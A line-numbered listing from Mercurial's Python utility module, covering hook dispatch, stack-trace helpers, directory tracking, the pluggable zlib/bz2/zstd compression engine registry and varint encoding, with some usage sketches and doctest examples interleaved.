3145 3367 _timenesting[0] += indent
3146 3368 try:
3147 3369 return func(*args, **kwargs)
3148 3370 finally:
3149 3371 elapsed = timer() - start
3150 3372 _timenesting[0] -= indent
3151 3373 stderr.write('%s%s: %s\n' %
3152 3374 (' ' * _timenesting[0], func.__name__,
3153 3375 timecount(elapsed)))
3154 3376 return wrapper
3155 3377
3156 3378 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3157 3379 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3158 3380
3159 3381 def sizetoint(s):
3160 3382 '''Convert a space specifier to a byte count.
3161 3383
3162 3384 >>> sizetoint(b'30')
3163 3385 30
3164 3386 >>> sizetoint(b'2.2kb')
3165 3387 2252
3166 3388 >>> sizetoint(b'6M')
3167 3389 6291456
3168 3390 '''
3169 3391 t = s.strip().lower()
3170 3392 try:
3171 3393 for k, u in _sizeunits:
3172 3394 if t.endswith(k):
3173 3395 return int(float(t[:-len(k)]) * u)
3174 3396 return int(t)
3175 3397 except ValueError:
3176 3398 raise error.ParseError(_("couldn't parse size: %s") % s)
3177 3399
3178 3400 class hooks(object):
3179 3401 '''A collection of hook functions that can be used to extend a
3180 3402 function's behavior. Hooks are called in lexicographic order,
3181 3403 based on the names of their sources.'''
3182 3404
3183 3405 def __init__(self):
3184 3406 self._hooks = []
3185 3407
3186 3408 def add(self, source, hook):
3187 3409 self._hooks.append((source, hook))
3188 3410
3189 3411 def __call__(self, *args):
3190 3412 self._hooks.sort(key=lambda x: x[0])
3191 3413 results = []
3192 3414 for source, hook in self._hooks:
3193 3415 results.append(hook(*args))
3194 3416 return results
3195 3417
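# Usage sketch for the hooks class above (the call order follows the
# source names, not insertion order, because __call__ sorts by source
# before dispatching):
#
#   >>> h = hooks()
#   >>> h.add('zed', lambda x: x * 2)
#   >>> h.add('alpha', lambda x: x + 1)
#   >>> h(10)
#   [11, 20]
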
3196 3418 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3197 3419 '''Yields lines for a nicely formatted stacktrace.
3198 3420 Skips the 'skip' last entries, then returns the last 'depth' entries.
3199 3421 Each file+linenumber is formatted according to fileline.
3200 3422 Each line is formatted according to line.
3201 3423 If line is None, it yields:
3202 3424 length of longest filepath+line number,
3203 3425 filepath+linenumber,
3204 3426 function
3205 3427
3206 3428 Not to be used in production code but very convenient while developing.
3207 3429 '''
3208 3430 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3209 3431 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3210 3432 ][-depth:]
3211 3433 if entries:
3212 3434 fnmax = max(len(entry[0]) for entry in entries)
3213 3435 for fnln, func in entries:
3214 3436 if line is None:
3215 3437 yield (fnmax, fnln, func)
3216 3438 else:
3217 3439 yield line % (fnmax, fnln, func)
3218 3440
3219 3441 def debugstacktrace(msg='stacktrace', skip=0,
3220 3442 f=stderr, otherf=stdout, depth=0):
3221 3443 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3222 3444 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3223 3445 By default it will flush stdout first.
3224 3446 It can be used everywhere and intentionally does not require a ui object.
3225 3447 Not to be used in production code but very convenient while developing.
3226 3448 '''
3227 3449 if otherf:
3228 3450 otherf.flush()
3229 3451 f.write('%s at:\n' % msg.rstrip())
3230 3452 for line in getstackframes(skip + 1, depth=depth):
3231 3453 f.write(line)
3232 3454 f.flush()
3233 3455
3234 3456 class dirs(object):
3235 3457 '''a multiset of directory names from a dirstate or manifest'''
3236 3458
3237 3459 def __init__(self, map, skip=None):
3238 3460 self._dirs = {}
3239 3461 addpath = self.addpath
3240 3462 if safehasattr(map, 'iteritems') and skip is not None:
3241 3463 for f, s in map.iteritems():
3242 3464 if s[0] != skip:
3243 3465 addpath(f)
3244 3466 else:
3245 3467 for f in map:
3246 3468 addpath(f)
3247 3469
3248 3470 def addpath(self, path):
3249 3471 dirs = self._dirs
3250 3472 for base in finddirs(path):
3251 3473 if base in dirs:
3252 3474 dirs[base] += 1
3253 3475 return
3254 3476 dirs[base] = 1
3255 3477
3256 3478 def delpath(self, path):
3257 3479 dirs = self._dirs
3258 3480 for base in finddirs(path):
3259 3481 if dirs[base] > 1:
3260 3482 dirs[base] -= 1
3261 3483 return
3262 3484 del dirs[base]
3263 3485
3264 3486 def __iter__(self):
3265 3487 return iter(self._dirs)
3266 3488
3267 3489 def __contains__(self, d):
3268 3490 return d in self._dirs
3269 3491
3270 3492 if safehasattr(parsers, 'dirs'):
3271 3493 dirs = parsers.dirs
3272 3494
3273 3495 def finddirs(path):
3274 3496 pos = path.rfind('/')
3275 3497 while pos != -1:
3276 3498 yield path[:pos]
3277 3499 pos = path.rfind('/', 0, pos)
3278 3500
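# Usage sketch for finddirs() and the dirs multiset above (the C
# implementation from parsers, substituted just above when available,
# is expected to behave identically):
#
#   >>> list(finddirs('a/b/c'))
#   ['a/b', 'a']
#   >>> d = dirs(['a/b/c', 'a/b/d'])
#   >>> d.delpath('a/b/c'); 'a/b' in d   # still held by 'a/b/d'
#   True
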
3279 3501 # compression code
3280 3502
3281 3503 SERVERROLE = 'server'
3282 3504 CLIENTROLE = 'client'
3283 3505
3284 3506 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3285 3507 (u'name', u'serverpriority',
3286 3508 u'clientpriority'))
3287 3509
3288 3510 class compressormanager(object):
3289 3511 """Holds registrations of various compression engines.
3290 3512
3291 3513 This class essentially abstracts the differences between compression
3292 3514 engines to allow new compression formats to be added easily, possibly from
3293 3515 extensions.
3294 3516
3295 3517 Compressors are registered against the global instance by calling its
3296 3518 ``register()`` method.
3297 3519 """
3298 3520 def __init__(self):
3299 3521 self._engines = {}
3300 3522 # Bundle spec human name to engine name.
3301 3523 self._bundlenames = {}
3302 3524 # Internal bundle identifier to engine name.
3303 3525 self._bundletypes = {}
3304 3526 # Revlog header to engine name.
3305 3527 self._revlogheaders = {}
3306 3528 # Wire proto identifier to engine name.
3307 3529 self._wiretypes = {}
3308 3530
3309 3531 def __getitem__(self, key):
3310 3532 return self._engines[key]
3311 3533
3312 3534 def __contains__(self, key):
3313 3535 return key in self._engines
3314 3536
3315 3537 def __iter__(self):
3316 3538 return iter(self._engines.keys())
3317 3539
3318 3540 def register(self, engine):
3319 3541 """Register a compression engine with the manager.
3320 3542
3321 3543 The argument must be a ``compressionengine`` instance.
3322 3544 """
3323 3545 if not isinstance(engine, compressionengine):
3324 3546 raise ValueError(_('argument must be a compressionengine'))
3325 3547
3326 3548 name = engine.name()
3327 3549
3328 3550 if name in self._engines:
3329 3551 raise error.Abort(_('compression engine %s already registered') %
3330 3552 name)
3331 3553
3332 3554 bundleinfo = engine.bundletype()
3333 3555 if bundleinfo:
3334 3556 bundlename, bundletype = bundleinfo
3335 3557
3336 3558 if bundlename in self._bundlenames:
3337 3559 raise error.Abort(_('bundle name %s already registered') %
3338 3560 bundlename)
3339 3561 if bundletype in self._bundletypes:
3340 3562 raise error.Abort(_('bundle type %s already registered by %s') %
3341 3563 (bundletype, self._bundletypes[bundletype]))
3342 3564
3343 3565 # Only register an external facing name if one was declared.
3344 3566 if bundlename:
3345 3567 self._bundlenames[bundlename] = name
3346 3568
3347 3569 self._bundletypes[bundletype] = name
3348 3570
3349 3571 wiresupport = engine.wireprotosupport()
3350 3572 if wiresupport:
3351 3573 wiretype = wiresupport.name
3352 3574 if wiretype in self._wiretypes:
3353 3575 raise error.Abort(_('wire protocol compression %s already '
3354 3576 'registered by %s') %
3355 3577 (wiretype, self._wiretypes[wiretype]))
3356 3578
3357 3579 self._wiretypes[wiretype] = name
3358 3580
3359 3581 revlogheader = engine.revlogheader()
3360 3582 if revlogheader and revlogheader in self._revlogheaders:
3361 3583 raise error.Abort(_('revlog header %s already registered by %s') %
3362 3584 (revlogheader, self._revlogheaders[revlogheader]))
3363 3585
3364 3586 if revlogheader:
3365 3587 self._revlogheaders[revlogheader] = name
3366 3588
3367 3589 self._engines[name] = engine
3368 3590
3369 3591 @property
3370 3592 def supportedbundlenames(self):
3371 3593 return set(self._bundlenames.keys())
3372 3594
3373 3595 @property
3374 3596 def supportedbundletypes(self):
3375 3597 return set(self._bundletypes.keys())
3376 3598
3377 3599 def forbundlename(self, bundlename):
3378 3600 """Obtain a compression engine registered to a bundle name.
3379 3601
3380 3602 Will raise KeyError if the bundle name isn't registered.
3381 3603
3382 3604 Will abort if the engine is known but not available.
3383 3605 """
3384 3606 engine = self._engines[self._bundlenames[bundlename]]
3385 3607 if not engine.available():
3386 3608 raise error.Abort(_('compression engine %s could not be loaded') %
3387 3609 engine.name())
3388 3610 return engine
3389 3611
3390 3612 def forbundletype(self, bundletype):
3391 3613 """Obtain a compression engine registered to a bundle type.
3392 3614
3393 3615 Will raise KeyError if the bundle type isn't registered.
3394 3616
3395 3617 Will abort if the engine is known but not available.
3396 3618 """
3397 3619 engine = self._engines[self._bundletypes[bundletype]]
3398 3620 if not engine.available():
3399 3621 raise error.Abort(_('compression engine %s could not be loaded') %
3400 3622 engine.name())
3401 3623 return engine
3402 3624
3403 3625 def supportedwireengines(self, role, onlyavailable=True):
3404 3626 """Obtain compression engines that support the wire protocol.
3405 3627
3406 3628 Returns a list of engines in prioritized order, most desired first.
3407 3629
3408 3630 If ``onlyavailable`` is set, filter out engines that can't be
3409 3631 loaded.
3410 3632 """
3411 3633 assert role in (SERVERROLE, CLIENTROLE)
3412 3634
3413 3635 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3414 3636
3415 3637 engines = [self._engines[e] for e in self._wiretypes.values()]
3416 3638 if onlyavailable:
3417 3639 engines = [e for e in engines if e.available()]
3418 3640
3419 3641 def getkey(e):
3420 3642 # Sort first by priority, highest first. In case of tie, sort
3421 3643 # alphabetically. This is arbitrary, but ensures output is
3422 3644 # stable.
3423 3645 w = e.wireprotosupport()
3424 3646 return -1 * getattr(w, attr), w.name
3425 3647
3426 3648 return list(sorted(engines, key=getkey))
3427 3649
3428 3650 def forwiretype(self, wiretype):
3429 3651 engine = self._engines[self._wiretypes[wiretype]]
3430 3652 if not engine.available():
3431 3653 raise error.Abort(_('compression engine %s could not be loaded') %
3432 3654 engine.name())
3433 3655 return engine
3434 3656
3435 3657 def forrevlogheader(self, header):
3436 3658 """Obtain a compression engine registered to a revlog header.
3437 3659
3438 3660 Will raise KeyError if the revlog header value isn't registered.
3439 3661 """
3440 3662 return self._engines[self._revlogheaders[header]]
3441 3663
3442 3664 compengines = compressormanager()
3443 3665
3444 3666 class compressionengine(object):
3445 3667 """Base class for compression engines.
3446 3668
3447 3669 Compression engines must implement the interface defined by this class.
3448 3670 """
3449 3671 def name(self):
3450 3672 """Returns the name of the compression engine.
3451 3673
3452 3674 This is the key the engine is registered under.
3453 3675
3454 3676 This method must be implemented.
3455 3677 """
3456 3678 raise NotImplementedError()
3457 3679
3458 3680 def available(self):
3459 3681 """Whether the compression engine is available.
3460 3682
3461 3683 The intent of this method is to allow optional compression engines
3462 3684 that may not be available in all installations (such as engines relying
3463 3685 on C extensions that may not be present).
3464 3686 """
3465 3687 return True
3466 3688
3467 3689 def bundletype(self):
3468 3690 """Describes bundle identifiers for this engine.
3469 3691
3470 3692 If this compression engine isn't supported for bundles, returns None.
3471 3693
3472 3694 If this engine can be used for bundles, returns a 2-tuple of strings of
3473 3695 the user-facing "bundle spec" compression name and an internal
3474 3696 identifier used to denote the compression format within bundles. To
3475 3697 exclude the name from external usage, set the first element to ``None``.
3476 3698
3477 3699 If bundle compression is supported, the class must also implement
3478 3700 ``compressstream`` and ``decompressorreader``.
3479 3701
3480 3702 The docstring of this method is used in the help system to tell users
3481 3703 about this engine.
3482 3704 """
3483 3705 return None
3484 3706
3485 3707 def wireprotosupport(self):
3486 3708 """Declare support for this compression format on the wire protocol.
3487 3709
3488 3710 If this compression engine isn't supported for compressing wire
3489 3711 protocol payloads, returns None.
3490 3712
3491 3713 Otherwise, returns ``compenginewireprotosupport`` with the following
3492 3714 fields:
3493 3715
3494 3716 * String format identifier
3495 3717 * Integer priority for the server
3496 3718 * Integer priority for the client
3497 3719
3498 3720 The integer priorities are used to order the advertisement of format
3499 3721 support by server and client. The highest integer is advertised
3500 3722 first. Integers with non-positive values aren't advertised.
3501 3723
3502 3724 The priority values are somewhat arbitrary and only used for default
3503 3725 ordering. The relative order can be changed via config options.
3504 3726
3505 3727 If wire protocol compression is supported, the class must also implement
3506 3728 ``compressstream`` and ``decompressorreader``.
3507 3729 """
3508 3730 return None
3509 3731
3510 3732 def revlogheader(self):
3511 3733 """Header added to revlog chunks that identifies this engine.
3512 3734
3513 3735 If this engine can be used to compress revlogs, this method should
3514 3736 return the bytes used to identify chunks compressed with this engine.
3515 3737 Else, the method should return ``None`` to indicate it does not
3516 3738 participate in revlog compression.
3517 3739 """
3518 3740 return None
3519 3741
3520 3742 def compressstream(self, it, opts=None):
3521 3743 """Compress an iterator of chunks.
3522 3744
3523 3745 The method receives an iterator (ideally a generator) of chunks of
3524 3746 bytes to be compressed. It returns an iterator (ideally a generator)
3525 3747 of chunks of bytes representing the compressed output.
3526 3748
3527 3749 Optionally accepts an argument defining how to perform compression.
3528 3750 Each engine treats this argument differently.
3529 3751 """
3530 3752 raise NotImplementedError()
3531 3753
3532 3754 def decompressorreader(self, fh):
3533 3755 """Perform decompression on a file object.
3534 3756
3535 3757 Argument is an object with a ``read(size)`` method that returns
3536 3758 compressed data. Return value is an object with a ``read(size)`` that
3537 3759 returns uncompressed data.
3538 3760 """
3539 3761 raise NotImplementedError()
3540 3762
3541 3763 def revlogcompressor(self, opts=None):
3542 3764 """Obtain an object that can be used to compress revlog entries.
3543 3765
3544 3766 The object has a ``compress(data)`` method that compresses binary
3545 3767 data. This method returns compressed binary data or ``None`` if
3546 3768 the data could not be compressed (too small, not compressible, etc).
3547 3769 The returned data should have a header uniquely identifying this
3548 3770 compression format so decompression can be routed to this engine.
3549 3771 This header should be identified by the ``revlogheader()`` return
3550 3772 value.
3551 3773
3552 3774 The object has a ``decompress(data)`` method that decompresses
3553 3775 data. The method will only be called if ``data`` begins with
3554 3776 ``revlogheader()``. The method should return the raw, uncompressed
3555 3777 data or raise a ``RevlogError``.
3556 3778
3557 3779 The object is reusable but is not thread safe.
3558 3780 """
3559 3781 raise NotImplementedError()
3560 3782
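# Sketch of what a third-party registration looks like (a hypothetical
# 'identity' engine; only the methods for the roles an engine declares
# need overriding, since bundletype(), wireprotosupport() and
# revlogheader() all default to None):
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def compressstream(self, it, opts=None):
#           return it
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
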
3561 3783 class _zlibengine(compressionengine):
3562 3784 def name(self):
3563 3785 return 'zlib'
3564 3786
3565 3787 def bundletype(self):
3566 3788 """zlib compression using the DEFLATE algorithm.
3567 3789
3568 3790 All Mercurial clients should support this format. The compression
3569 3791 algorithm strikes a reasonable balance between compression ratio
3570 3792 and size.
3571 3793 """
3572 3794 return 'gzip', 'GZ'
3573 3795
3574 3796 def wireprotosupport(self):
3575 3797 return compewireprotosupport('zlib', 20, 20)
3576 3798
3577 3799 def revlogheader(self):
3578 3800 return 'x'
3579 3801
3580 3802 def compressstream(self, it, opts=None):
3581 3803 opts = opts or {}
3582 3804
3583 3805 z = zlib.compressobj(opts.get('level', -1))
3584 3806 for chunk in it:
3585 3807 data = z.compress(chunk)
3586 3808 # Not all calls to compress emit data. It is cheaper to inspect
3587 3809 # here than to feed empty chunks through the generator.
3588 3810 if data:
3589 3811 yield data
3590 3812
3591 3813 yield z.flush()
3592 3814
3593 3815 def decompressorreader(self, fh):
3594 3816 def gen():
3595 3817 d = zlib.decompressobj()
3596 3818 for chunk in filechunkiter(fh):
3597 3819 while chunk:
3598 3820 # Limit output size to limit memory.
3599 3821 yield d.decompress(chunk, 2 ** 18)
3600 3822 chunk = d.unconsumed_tail
3601 3823
3602 3824 return chunkbuffer(gen())
3603 3825
3604 3826 class zlibrevlogcompressor(object):
3605 3827 def compress(self, data):
3606 3828 insize = len(data)
3607 3829 # Caller handles empty input case.
3608 3830 assert insize > 0
3609 3831
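# Below this size, zlib's fixed stream overhead (header plus checksum)
# makes a net size win vanishingly unlikely; the exact cutoff is
# presumably empirical.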
3610 3832 if insize < 44:
3611 3833 return None
3612 3834
3613 3835 elif insize <= 1000000:
3614 3836 compressed = zlib.compress(data)
3615 3837 if len(compressed) < insize:
3616 3838 return compressed
3617 3839 return None
3618 3840
3619 3841 # zlib makes an internal copy of the input buffer, doubling
3620 3842 # memory usage for large inputs. So do streaming compression
3621 3843 # on large inputs.
3622 3844 else:
3623 3845 z = zlib.compressobj()
3624 3846 parts = []
3625 3847 pos = 0
3626 3848 while pos < insize:
3627 3849 pos2 = pos + 2**20
3628 3850 parts.append(z.compress(data[pos:pos2]))
3629 3851 pos = pos2
3630 3852 parts.append(z.flush())
3631 3853
3632 3854 if sum(map(len, parts)) < insize:
3633 3855 return ''.join(parts)
3634 3856 return None
3635 3857
3636 3858 def decompress(self, data):
3637 3859 try:
3638 3860 return zlib.decompress(data)
3639 3861 except zlib.error as e:
3640 3862 raise error.RevlogError(_('revlog decompress error: %s') %
3641 3863 forcebytestr(e))
3642 3864
3643 3865 def revlogcompressor(self, opts=None):
3644 3866 return self.zlibrevlogcompressor()
3645 3867
3646 3868 compengines.register(_zlibengine())
3647 3869
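# decompressorreader() above bounds memory by requesting at most 2**18
# output bytes per call and re-feeding d.unconsumed_tail. A standalone
# sketch of that pattern over an in-memory buffer (illustrative name;
# the output cap is shrunk so the doctest actually exercises the loop):

def _boundedzlibexample(data, maxout=64):
    """Decompress zlib `data`, yielding at most `maxout` bytes at a time.

    >>> import zlib
    >>> b''.join(_boundedzlibexample(zlib.compress(b'x' * 10000))) == b'x' * 10000
    True
    """
    import zlib
    d = zlib.decompressobj()
    chunk = data
    while chunk:
        out = d.decompress(chunk, maxout)
        if out:
            yield out
        chunk = d.unconsumed_tail
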
3648 3870 class _bz2engine(compressionengine):
3649 3871 def name(self):
3650 3872 return 'bz2'
3651 3873
3652 3874 def bundletype(self):
3653 3875 """An algorithm that produces smaller bundles than ``gzip``.
3654 3876
3655 3877 All Mercurial clients should support this format.
3656 3878
3657 3879 This engine will likely produce smaller bundles than ``gzip`` but
3658 3880 will be significantly slower, both during compression and
3659 3881 decompression.
3660 3882
3661 3883 If available, the ``zstd`` engine can yield similar or better
3662 3884 compression at much higher speeds.
3663 3885 """
3664 3886 return 'bzip2', 'BZ'
3665 3887
3666 3888 # We declare a protocol name but don't advertise by default because
3667 3889 # it is slow.
3668 3890 def wireprotosupport(self):
3669 3891 return compewireprotosupport('bzip2', 0, 0)
3670 3892
3671 3893 def compressstream(self, it, opts=None):
3672 3894 opts = opts or {}
3673 3895 z = bz2.BZ2Compressor(opts.get('level', 9))
3674 3896 for chunk in it:
3675 3897 data = z.compress(chunk)
3676 3898 if data:
3677 3899 yield data
3678 3900
3679 3901 yield z.flush()
3680 3902
3681 3903 def decompressorreader(self, fh):
3682 3904 def gen():
3683 3905 d = bz2.BZ2Decompressor()
3684 3906 for chunk in filechunkiter(fh):
3685 3907 yield d.decompress(chunk)
3686 3908
3687 3909 return chunkbuffer(gen())
3688 3910
3689 3911 compengines.register(_bz2engine())
3690 3912
3691 3913 class _truncatedbz2engine(compressionengine):
3692 3914 def name(self):
3693 3915 return 'bz2truncated'
3694 3916
3695 3917 def bundletype(self):
3696 3918 return None, '_truncatedBZ'
3697 3919
3698 3920 # We don't implement compressstream because it is hackily handled elsewhere.
3699 3921
3700 3922 def decompressorreader(self, fh):
3701 3923 def gen():
3702 3924 # The input stream doesn't have the 'BZ' header. So add it back.
3703 3925 d = bz2.BZ2Decompressor()
3704 3926 d.decompress('BZ')
3705 3927 for chunk in filechunkiter(fh):
3706 3928 yield d.decompress(chunk)
3707 3929
3708 3930 return chunkbuffer(gen())
3709 3931
3710 3932 compengines.register(_truncatedbz2engine())
3711 3933
3712 3934 class _noopengine(compressionengine):
3713 3935 def name(self):
3714 3936 return 'none'
3715 3937
3716 3938 def bundletype(self):
3717 3939 """No compression is performed.
3718 3940
3719 3941 Use this compression engine to explicitly disable compression.
3720 3942 """
3721 3943 return 'none', 'UN'
3722 3944
3723 3945 # Clients always support uncompressed payloads. Servers don't advertise
3724 3946 # it by default because, unless you are on a fast network, uncompressed
3725 3947 # payloads can easily saturate your network pipe.
3726 3948 def wireprotosupport(self):
3727 3949 return compewireprotosupport('none', 0, 10)
3728 3950
3729 3951 # We don't implement revlogheader because it is handled specially
3730 3952 # in the revlog class.
3731 3953
3732 3954 def compressstream(self, it, opts=None):
3733 3955 return it
3734 3956
3735 3957 def decompressorreader(self, fh):
3736 3958 return fh
3737 3959
3738 3960 class nooprevlogcompressor(object):
3739 3961 def compress(self, data):
3740 3962 return None
3741 3963
3742 3964 def revlogcompressor(self, opts=None):
3743 3965 return self.nooprevlogcompressor()
3744 3966
3745 3967 compengines.register(_noopengine())
3746 3968
3747 3969 class _zstdengine(compressionengine):
3748 3970 def name(self):
3749 3971 return 'zstd'
3750 3972
3751 3973 @propertycache
3752 3974 def _module(self):
3753 3975 # Not all installs have the zstd module available. So defer importing
3754 3976 # until first access.
3755 3977 try:
3756 3978 from . import zstd
3757 3979 # Force delayed import.
3758 3980 zstd.__version__
3759 3981 return zstd
3760 3982 except ImportError:
3761 3983 return None
3762 3984
3763 3985 def available(self):
3764 3986 return bool(self._module)
3765 3987
3766 3988 def bundletype(self):
3767 3989 """A modern compression algorithm that is fast and highly flexible.
3768 3990
3769 3991 Only supported by Mercurial 4.1 and newer clients.
3770 3992
3771 3993 With the default settings, zstd compression is both faster and yields
3772 3994 better compression than ``gzip``. It also frequently yields better
3773 3995 compression than ``bzip2`` while operating at much higher speeds.
3774 3996
3775 3997 If this engine is available and backwards compatibility is not a
3776 3998 concern, it is likely the best available engine.
3777 3999 """
3778 4000 return 'zstd', 'ZS'
3779 4001
3780 4002 def wireprotosupport(self):
3781 4003 return compewireprotosupport('zstd', 50, 50)
3782 4004
3783 4005 def revlogheader(self):
3784 4006 return '\x28'
3785 4007
3786 4008 def compressstream(self, it, opts=None):
3787 4009 opts = opts or {}
3788 4010 # zstd level 3 is almost always significantly faster than zlib
3789 4011 # while providing no worse compression. It strikes a good balance
3790 4012 # between speed and compression.
3791 4013 level = opts.get('level', 3)
3792 4014
3793 4015 zstd = self._module
3794 4016 z = zstd.ZstdCompressor(level=level).compressobj()
3795 4017 for chunk in it:
3796 4018 data = z.compress(chunk)
3797 4019 if data:
3798 4020 yield data
3799 4021
3800 4022 yield z.flush()
3801 4023
3802 4024 def decompressorreader(self, fh):
3803 4025 zstd = self._module
3804 4026 dctx = zstd.ZstdDecompressor()
3805 4027 return chunkbuffer(dctx.read_from(fh))
3806 4028
3807 4029 class zstdrevlogcompressor(object):
3808 4030 def __init__(self, zstd, level=3):
3809 4031 # Writing the content size adds a few bytes to the output. However,
3810 4032 # it allows decompression to be more optimal since we can
3811 4033 # pre-allocate a buffer to hold the result.
3812 4034 self._cctx = zstd.ZstdCompressor(level=level,
3813 4035 write_content_size=True)
3814 4036 self._dctx = zstd.ZstdDecompressor()
3815 4037 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3816 4038 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3817 4039
3818 4040 def compress(self, data):
3819 4041 insize = len(data)
3820 4042 # Caller handles empty input case.
3821 4043 assert insize > 0
3822 4044
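# Mirrors the zlib engine's small-input cutoff: inputs this small are
# assumed not to shrink enough to pay for the frame overhead (the
# exact threshold is presumably empirical).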
3823 4045 if insize < 50:
3824 4046 return None
3825 4047
3826 4048 elif insize <= 1000000:
3827 4049 compressed = self._cctx.compress(data)
3828 4050 if len(compressed) < insize:
3829 4051 return compressed
3830 4052 return None
3831 4053 else:
3832 4054 z = self._cctx.compressobj()
3833 4055 chunks = []
3834 4056 pos = 0
3835 4057 while pos < insize:
3836 4058 pos2 = pos + self._compinsize
3837 4059 chunk = z.compress(data[pos:pos2])
3838 4060 if chunk:
3839 4061 chunks.append(chunk)
3840 4062 pos = pos2
3841 4063 chunks.append(z.flush())
3842 4064
3843 4065 if sum(map(len, chunks)) < insize:
3844 4066 return ''.join(chunks)
3845 4067 return None
3846 4068
3847 4069 def decompress(self, data):
3848 4070 insize = len(data)
3849 4071
3850 4072 try:
3851 4073 # This was measured to be faster than other streaming
3852 4074 # decompressors.
3853 4075 dobj = self._dctx.decompressobj()
3854 4076 chunks = []
3855 4077 pos = 0
3856 4078 while pos < insize:
3857 4079 pos2 = pos + self._decompinsize
3858 4080 chunk = dobj.decompress(data[pos:pos2])
3859 4081 if chunk:
3860 4082 chunks.append(chunk)
3861 4083 pos = pos2
3862 4084 # Frame should be exhausted, so no finish() API.
3863 4085
3864 4086 return ''.join(chunks)
3865 4087 except Exception as e:
3866 4088 raise error.RevlogError(_('revlog decompress error: %s') %
3867 4089 forcebytestr(e))
3868 4090
3869 4091 def revlogcompressor(self, opts=None):
3870 4092 opts = opts or {}
3871 4093 return self.zstdrevlogcompressor(self._module,
3872 4094 level=opts.get('level', 3))
3873 4095
3874 4096 compengines.register(_zstdengine())
3875 4097
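# Both revlog compressors above share a contract: return the compressed
# bytes only when they are strictly smaller than the input, else None so
# the caller stores the chunk uncompressed. A compact sketch of that
# contract using stdlib zlib (illustrative name, not Mercurial API):

def _maybecompressexample(data):
    """Return compressed `data`, or None when compression doesn't pay.

    >>> _maybecompressexample(b'z' * 1000) is None
    False
    >>> _maybecompressexample(b'abc') is None
    True
    """
    import zlib
    if not data:
        return None
    compressed = zlib.compress(data)
    return compressed if len(compressed) < len(data) else None
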
3876 4098 def bundlecompressiontopics():
3877 4099 """Obtains a list of available bundle compressions for use in help."""
3878 4100 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3879 4101 items = {}
3880 4102
3881 4103 # We need to format the docstring. So use a dummy object/type to hold it
3882 4104 # rather than mutating the original.
3883 4105 class docobject(object):
3884 4106 pass
3885 4107
3886 4108 for name in compengines:
3887 4109 engine = compengines[name]
3888 4110
3889 4111 if not engine.available():
3890 4112 continue
3891 4113
3892 4114 bt = engine.bundletype()
3893 4115 if not bt or not bt[0]:
3894 4116 continue
3895 4117
3896 4118 doc = pycompat.sysstr('``%s``\n %s') % (
3897 4119 bt[0], engine.bundletype.__doc__)
3898 4120
3899 4121 value = docobject()
3900 4122 value.__doc__ = doc
3901 4123 value._origdoc = engine.bundletype.__doc__
3902 4124 value._origfunc = engine.bundletype
3903 4125
3904 4126 items[bt[0]] = value
3905 4127
3906 4128 return items
3907 4129
3908 4130 i18nfunctions = bundlecompressiontopics().values()
3909 4131
3910 4132 # convenient shortcut
3911 4133 dst = debugstacktrace
3912 4134
3913 4135 def safename(f, tag, ctx, others=None):
3914 4136 """
3915 4137 Generate a name that is safe to rename f to in the given context.
3916 4138
3917 4139 f: filename to rename
3918 4140 tag: a string tag that will be included in the new name
3919 4141 ctx: a context, in which the new name must not exist
3920 4142 others: a set of other filenames that the new name must not be in
3921 4143
3922 4144 Returns a file name of the form oldname~tag[~number] which does not exist
3923 4145 in the provided context and is not in the set of other names.
3924 4146 """
3925 4147 if others is None:
3926 4148 others = set()
3927 4149
3928 4150 fn = '%s~%s' % (f, tag)
3929 4151 if fn not in ctx and fn not in others:
3930 4152 return fn
3931 4153 for n in itertools.count(1):
3932 4154 fn = '%s~%s~%s' % (f, tag, n)
3933 4155 if fn not in ctx and fn not in others:
3934 4156 return fn
3935 4157
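# Usage sketch: anything supporting the `in` operator works as the
# context, so a plain set is enough to see the naming scheme:
#
#   >>> taken = {'foo~resolve', 'foo~resolve~1'}
#   >>> safename('foo', 'resolve', taken)
#   'foo~resolve~2'
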
3936 4158 def readexactly(stream, n):
3937 4159 '''read n bytes from stream.read and abort if less was available'''
3938 4160 s = stream.read(n)
3939 4161 if len(s) < n:
3940 4162 raise error.Abort(_("stream ended unexpectedly"
3941 4163 " (got %d bytes, expected %d)")
3942 4164 % (len(s), n))
3943 4165 return s
3944 4166
3945 4167 def uvarintencode(value):
3946 4168 """Encode an unsigned integer value to a varint.
3947 4169
3948 4170 A varint is a variable length integer of 1 or more bytes. Each byte
3949 4171 except the last has the most significant bit set. The lower 7 bits of
3950 4172 each byte store the 2's complement representation, least significant group
3951 4173 first.
3952 4174
3953 4175 >>> uvarintencode(0)
3954 4176 '\\x00'
3955 4177 >>> uvarintencode(1)
3956 4178 '\\x01'
3957 4179 >>> uvarintencode(127)
3958 4180 '\\x7f'
3959 4181 >>> uvarintencode(1337)
3960 4182 '\\xb9\\n'
3961 4183 >>> uvarintencode(65536)
3962 4184 '\\x80\\x80\\x04'
3963 4185 >>> uvarintencode(-1)
3964 4186 Traceback (most recent call last):
3965 4187 ...
3966 4188 ProgrammingError: negative value for uvarint: -1
3967 4189 """
3968 4190 if value < 0:
3969 4191 raise error.ProgrammingError('negative value for uvarint: %d'
3970 4192 % value)
3971 4193 bits = value & 0x7f
3972 4194 value >>= 7
3973 4195 bytes = []
3974 4196 while value:
3975 4197 bytes.append(pycompat.bytechr(0x80 | bits))
3976 4198 bits = value & 0x7f
3977 4199 value >>= 7
3978 4200 bytes.append(pycompat.bytechr(bits))
3979 4201
3980 4202 return ''.join(bytes)
3981 4203
3982 4204 def uvarintdecodestream(fh):
3983 4205 """Decode an unsigned variable length integer from a stream.
3984 4206
3985 4207 The passed argument is anything that has a ``.read(N)`` method.
3986 4208
3987 4209 >>> try:
3988 4210 ... from StringIO import StringIO as BytesIO
3989 4211 ... except ImportError:
3990 4212 ... from io import BytesIO
